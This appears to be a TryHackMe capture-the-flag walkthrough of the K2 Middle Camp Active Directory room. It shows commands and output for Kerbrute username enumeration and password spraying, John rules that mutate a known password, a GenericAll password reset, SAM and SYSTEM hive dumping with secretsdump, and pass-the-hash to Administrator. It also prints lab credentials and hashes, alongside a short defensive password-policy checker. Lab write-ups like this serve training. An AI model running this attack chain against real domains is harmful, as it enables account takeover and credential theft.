Introduction
In this walkthrough, we’ll be solving the K2: The Middle Camp room on TryHackMe, the second stage of the K2 challenge series.
Unlike standalone rooms, K2 is a multi-stage penetration testing scenario, where each machine builds on the previous one. This means the credentials, usernames, and information gathered during Base Camp play a crucial role in successfully attacking this machine.
The Middle Camp focuses heavily on Active Directory (AD) enumeration, credential reuse, and lateral movement, simulating real-world enterprise environments. You’ll learn how attackers move from initial access to deeper control within a domain.
This guide is designed to walk you through the entire process step-by-step — from enumeration to privilege escalation — while explaining the reasoning behind each action.
Whether you’re preparing for certifications or improving your red team skills, this walkthrough will help you understand how real-world AD attacks are performed.
What You’ll Learn
- Active Directory enumeration techniques (Kerberos, LDAP, SMB)
- Username discovery and password spraying
- Gaining initial access using reused credentials
- Lateral movement using BloodHound insights
- Privilege escalation to Domain Administrator
Room Overview
- Platform: TryHackMe
- Room: K2 – The Middle Camp
- Difficulty: Medium / Hard
- Category: Active Directory / Network Exploitation
- Prerequisite: Completion of Base Camp, AD knowledge (Kerberos username enumeration and brute force), BloodHound, privilege escalation, Pass the Hash, etc.
Enumeration
nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49669/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49681/tcp open unknown
49707/tcp open unknown
49817/tcp open unknown
┌──(alen㉿kali)-[~/Downloads/k2]
└─$ nmap -A -p 53,88,135,139,389,445,3389 k2.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 12:50 +04
Nmap scan report for k2.thm (10.10.254.233)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-02 08:50:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Not valid before: 2025-04-01T08:42:55
|_Not valid after: 2025-10-01T08:42:55
|_ssl-date: 2025-04-02T08:51:36+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: K2
| NetBIOS_Domain_Name: K2
| NetBIOS_Computer_Name: K2SERVER
| DNS_Domain_Name: k2.thm
| DNS_Computer_Name: K2Server.k2.thm
| DNS_Tree_Name: k2.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-02T08:50:56+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-02T08:50:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 145.96 ms 10.14.0.1
2 146.11 ms k2.thm (10.10.254.233)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.43 seconds
The aggressive scan reveals the DNS computer name K2Server.k2.thm (the domain controller) in the domain k2.thm, so we add k2server.k2.thm to /etc/hosts before going further.
Creating usernames from Username Anarchy
For the Middle Camp, the room tells us to reuse the information gathered while solving Base Camp. From it we have the full names of two users, James Bold and Rose Bud, so the next step is to work out which Active Directory usernames correspond to these names. Username Anarchy generates a list of probable username formats from a full name:
┌──(alen㉿kali)-[~/Downloads/Tools/username-anarchy]
└─$ ./username-anarchy James Bold
james
jamesbold
james.bold
jamesbol
jamebold
jamesb
j.bold
jbold
bjames
b.james
boldj
bold
bold.j
bold.james
jb
┌──(alen㉿kali)-[~/Downloads/Tools/username-anarchy]
└─$ ./username-anarchy Rose Bud
rose
rosebud
rose.bud
roseb
r.bud
rbud
brose
b.rose
budr
bud
bud.r
bud.rose
rb
We can store the list of probable usernames in users.txt file
Username Enumeration using Kerbrute
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 userenum --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/users.txt
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 12:59:17 > Using KDC(s):
2025/04/02 12:59:17 > k2server.k2.thm:88
2025/04/02 12:59:17 > [+] VALID USERNAME: j.bold@k2.thm
2025/04/02 12:59:17 > [+] VALID USERNAME: r.bud@k2.thm
2025/04/02 12:59:17 > Done! Tested 28 usernames (2 valid) in 0.595 seconds
With the two usernames confirmed, the next check is whether any of the passwords recovered from Base Camp are still valid for them:
┌──(alen㉿kali)-[~/Downloads/k2]
└─$ cat passwords.txt
Pwd@9tLNrC3!
RdzQ7MSKt)fNaz3!
vRMkaVgdfxhW!8
With this password list, we use Kerbrute's bruteuser mode to spray the passwords against r.bud and j.bold in turn and see which one works:
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/passwords.txt r.bud
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 13:08:50 > Using KDC(s):
2025/04/02 13:08:50 > k2server.k2.thm:88
2025/04/02 13:08:51 > [+] VALID LOGIN: r.bud@k2.thm:vRMkaVgdfxhW!8
2025/04/02 13:08:51 > Done! Tested 3 logins (1 successes) in 0.631 seconds
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/passwords.txt j.bold
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 13:09:11 > Using KDC(s):
2025/04/02 13:09:11 > k2server.k2.thm:88
2025/04/02 13:09:11 > Done! Tested 3 logins (0 successes) in 0.364 seconds
So we have found valid AD credentials:
r.bud@k2.thm:vRMkaVgdfxhW!8
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u r.bud -p vRMkaVgdfxhW!8 -i k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\r.bud\Documents> dir
Directory: C:\Users\r.bud\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2024 7:07 PM 327 notes.txt
-a---- 1/29/2024 7:09 PM 349 note_to_james.txt
*Evil-WinRM* PS C:\Users\r.bud\Documents> type notes.txt
Done:
1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.
2. James's password meets the criteria.
Pending:
1. Give James Remote Access.
*Evil-WinRM* PS C:\Users\r.bud\Documents> type note_to_james.txt
Hello James:
Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.
At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
*Evil-WinRM* PS C:\Users\r.bud\Documents>
The two notes give us everything needed to guess James's new password: note_to_james.txt says his old password was "rockyou" and states the new policy, and notes.txt says he kept the base password and only added two characters to meet that policy. So we need to generate candidate passwords built from that base according to the policy.
Creating Custom Password using John The Ripper
We create a custom rule set in John the Ripper that encodes the policy: a base word with digits and one special character prepended or appended.
[List.Rules:Custom]
^[0-9]^[!@#$] # adds a number and a special character at the beginning
^[0-9]^[0-9]^[!@#$] # adds two numbers and a special character at the beginning
^[0-9]^[0-9]^[0-9]^[!@#$] # adds three numbers and a special character at the beginning
$[0-9]$[!@#$] # adds a number and a special character at the end
$[0-9]$[0-9]$[!@#$] # adds two numbers and a special character at the end
$[0-9]$[0-9]$[0-9]$[!@#$] # adds three numbers and a special character at the end
Then run John in --stdout mode against a wordlist containing the base word:
┌──(alen㉿kali)-[~/Downloads]
└─$ john --wordlist=passrock.txt --rules=Custom --stdout > passwdrock
This writes every generated combination to passwdrock.
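The policy in note_to_james.txt is mechanically checkable, and the rule set above is a direct consequence of it: a user who keeps a dictionary base word and bolts two characters onto it satisfies every rule. The following Python checker is an added example, not part of the room or the author's tooling. It encodes the three stated rules, then separately strips the digits and symbols to test whether what remains is a banned base word; the set of special characters and the banned-word list are assumptions, and the reading of "a number between 0-999" as a digit run whose value is at most 999 is an interpretation.

```python
import re

# The three rules from note_to_james.txt, encoded as checks. The set of
# "special" characters is an assumption (the note does not define one).
SPECIALS = set("!@#$%^&*()-_=+[]{};:'\",.<>/?\\|`~")


def policy_violations(pw: str) -> list:
    """Return the policy rules the password breaks (empty list = compliant)."""
    problems = []
    if not 6 <= len(pw) <= 12:
        problems.append("length must be between 6 and 12 characters")
    if not any(c in SPECIALS for c in pw):
        problems.append("must include at least one special character")
    # "a number between 0-999": read here as at least one run of digits
    # whose value is at most 999 (an interpretation; the note is not precise).
    if not any(int(run) <= 999 for run in re.findall(r"\d+", pw)):
        problems.append("must include a number in the range 0-999")
    return problems


def is_policy_compliant(pw: str) -> bool:
    return not policy_violations(pw)


def alpha_core(pw: str) -> str:
    """Letters only, lower-cased: the base a user keeps when they decorate
    an old password with digits and symbols to satisfy a policy."""
    return re.sub(r"[^A-Za-z]", "", pw).lower()


def has_weak_base(pw: str, banned_bases: set) -> bool:
    """True when stripping the decoration leaves a banned dictionary word."""
    return alpha_core(pw) in banned_bases


def audit_password(pw: str, banned_bases: set) -> dict:
    """Combine both checks: a password can satisfy the policy and still be weak."""
    violations = policy_violations(pw)
    weak = has_weak_base(pw, banned_bases)
    return {
        "policy_compliant": not violations,
        "violations": violations,
        "weak_base": alpha_core(pw) if weak else None,
        "acceptable": not violations and not weak,
    }


# Constructed banned-base list. In a real deployment this would be a breached
# or common-password list consulted at password-change time.
BANNED_BASES = {"rockyou", "password", "welcome", "summer"}

if __name__ == "__main__":
    for candidate in ["rockyou", "#8rockyou", "Pwd@9tLNrC3!", "RdzQ7MSKt)fNaz3!"]:
        print(candidate, audit_password(candidate, BANNED_BASES))
```

Run against the passwords seen on this page, "#8rockyou" passes all three rules yet fails the base-word check, while two of the Base Camp passwords fail only because the policy caps length at 12 characters. A policy that rejects the banned base regardless of decoration, and has no upper length limit, would have blocked exactly the candidate the John rules produce.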
Using Bruteuser of Kerbrute against j.bold
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/passwdrock j.bold
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 20:53:01 > Using KDC(s):
2025/04/02 20:53:01 > k2server.k2.thm:88
2025/04/02 20:53:02 > [+] VALID LOGIN: j.bold@k2.thm:#8rockyou
2025/04/02 20:53:03 > Done! Tested 64 logins (1 successes) in 2.170 seconds
From the notes we know that James's remote access was removed, so even with a valid password j.bold cannot log in over WinRM directly; we need another route into the domain.
Bloodhound and Neo4j
Start Neo4j with sudo neo4j console in one terminal and BloodHound in another. To collect the data, use the ad-bloodhound script from tyler; it produces 7 files, and uploading the JSON files into BloodHound gives us the map of the AD environment.

Searching for j.bold and looking at its group memberships shows that it is a member of IT STAFF 1, and that there is a GenericAll relationship between j.smith and IT STAFF 1. That is what allows us to reset j.smith's password using j.bold's credentials:


┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ net rpc password "j.smith" "AlenBenedict123" -U "k2.thm"/"j.bold"%"#8rockyou" -S "k2server.k2.thm"
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u j.smith -p AlenBenedict123 -i k2.thm
*Evil-WinRM* PS C:Usersj.smithDesktop> cat user.txt
THM{********************************}

BloodHound also shows that j.smith is a member of Backup Operators.
We can use this article to perform the Backup Operators privilege escalation.
Backup Operators is one of the built-in groups with interesting privileges: its members hold SeBackupPrivilege, which lets them read any file on the host regardless of its ACL, including the SAM and SYSTEM registry hives.
Following the steps from the article:
*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.
*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.
Then download both hives to your own machine with Evil-WinRM's download command:
*Evil-WinRM* PS C:\Users> download c:\Windows\Tasks\SAM
Info: Downloading C:\Users\c:\Windows\Tasks\SAM to c:\Windows\Tasks\SAM
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> cd Windows
*Evil-WinRM* PS C:\Windows> cd Tasks
*Evil-WinRM* PS C:\Windows\Tasks> download SAM
Info: Downloading C:\Windows\Tasks\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Windows\Tasks> download SYSTEM
Info: Downloading C:\Windows\Tasks\SYSTEM to SYSTEM
Info: Download successful!
*Evil-WinRM* PS C:\Windows\Tasks>
It failed when I was in the Users directory, so I changed the directory to where the file was and the download worked.
Secretsdump
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9545b61858c043477c350ae86c37b32f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
With the Administrator NT hash extracted, we can pass the hash to authenticate as the Administrator account without ever knowing the password:
Pass the Hash
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u administrator -H 9545b61858c043477c350ae86c37b32f -i k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 5/29/2023 11:00 PM 37 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
THM{********************************}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>